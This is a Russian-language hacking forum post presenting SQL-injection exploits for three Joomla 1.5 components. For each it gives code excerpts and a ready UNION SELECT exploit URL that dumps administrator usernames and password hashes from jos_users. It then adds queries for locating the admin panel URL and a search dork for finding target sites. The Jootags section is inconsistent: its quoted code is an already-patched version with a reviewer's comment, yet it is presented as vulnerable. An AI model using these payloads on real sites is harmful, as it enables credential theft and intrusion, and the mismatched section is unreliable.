Понеслась...
1 :: com_messaging :: SQL-inj && v1.5
com_messaging.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
require_once([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]DS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'helper.php'[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mesuid'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$messages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]modMessagingHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getMessaging[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
helper.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]guest[/COLOR][COLOR="#007700"]){
return -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}else{
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" SELECT * FROM #__messaging WHERE idTo='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' AND seen=0 ORDER BY date DESC"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
return[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
}
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
exploit:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_messaging&view=message&mesuid=-666++union+select+1,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),3,4,5,6,7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
2 :: com_azcontentlist :: SQL-inj && v1.5
azcontentlist.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]JDate[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]toMySQL[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$nullDate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNullDate[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT c.title AS title, c.id, c.catid, c.sectionid, cc.title AS category, s.title AS section FROM #__content AS c"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__categories AS cc ON cc.id = c.catid'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__sections AS s ON s.id = c.sectionid'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE c.access = 0 AND c.state = 1"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND cc.access = 0'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND s.access = 0'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" AND ( publish_up = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]" OR publish_up [/COLOR][COLOR="#0000BB"]Quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" )"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY title"
[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadAssocList[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#DD0000"]'A-Z Site Map'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]//$app =& JFactory::getApplication();
//$Itemid = $app->getItemid( $result['id'] );
[/COLOR][COLOR="#007700"]...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_azcontentlist&view=title&cat=3&date=-666++union+select+1,2,3,4,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
3 :: Jootags component :: SQL-inj && v1.5
tags.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
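/**
 * Look up a tag id by its exact title.
 *
 * The caller in controller.php passes $_GET['tag'] straight in, so $title
 * must be treated as untrusted. The original inlined it into the WHERE
 * clause as "t.title='$title'", which let a crafted value close the
 * string literal and append arbitrary SQL. Routing the value through the
 * driver's Quote() escapes it and adds the surrounding quotes, so the
 * user-controlled text can only ever be compared as a title.
 *
 * @param string $title Tag title as supplied by the request.
 * @return mixed Whatever $this->_db->LoadResult() yields for the first
 *               matching row (the id column), or null when nothing matches.
 *
 * NOTE(review): controller.php destructures the result with
 * list($tag_id, $tag_title); the SELECT shown here returns only t.id —
 * confirm the full query in the real file also returns the title.
 */
function getTagByTitle($title) {
    // Quote() both escapes and wraps the value, so no manual quoting here.
    $query = ' SELECT t.id '
        . ' FROM #__jootags_tags AS t '
        . ' WHERE t.title = ' . $this->_db->Quote($title);
    $this->_db->setQuery($query);
    return $this->_db->LoadResult();
}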
...
[/COLOR][/COLOR]
controller.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDocument[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]() );
[/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'layout'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_jootags'[/COLOR][COLOR="#007700"]);;
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getView[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'base_path'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_basePath[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tags'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
}
=====>>>> list([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tag'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limitstart[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Tags'[/COLOR][COLOR="#007700"]));
}
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLayout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_jootags&itemid=8&view=model&tag=-666++union+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),9,10,11,12+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
Достаем url ресурса из БД.
Кто знает — поймёт. Ох, сколько я мучился, найдя таблицы джумлы в базе, на которую ссылается, к примеру, какой-нибудь wp'шный сайт. И как всегда — ответ перед носом!
SELECT link FROM jos_menu WHERE alias = adminlink [version 1.5]
На выходе увидите урл админки, конечно же с текущим ресурсом!
p.s. z0mbyak, если ты это знал и не запостил где-нить...ц...на сколько ж я ресурсов забил из-за этого...ты бы знал...
============
UPDATE #1
Так-с... то, что выше — это для версии 1.5
SELECT link FROM jos_menu WHERE title = admin [version 1.6]
============
UPDATE #2 (метод для всех веток)
Код:
Code:
SELECT name FROM u158069.joomla_menu LIMIT 0,1 (а)
SELECT link FROM u158069.joomla_menu LIMIT 0,1 (b)
Код:
Code:
dork: inurl:b intext:a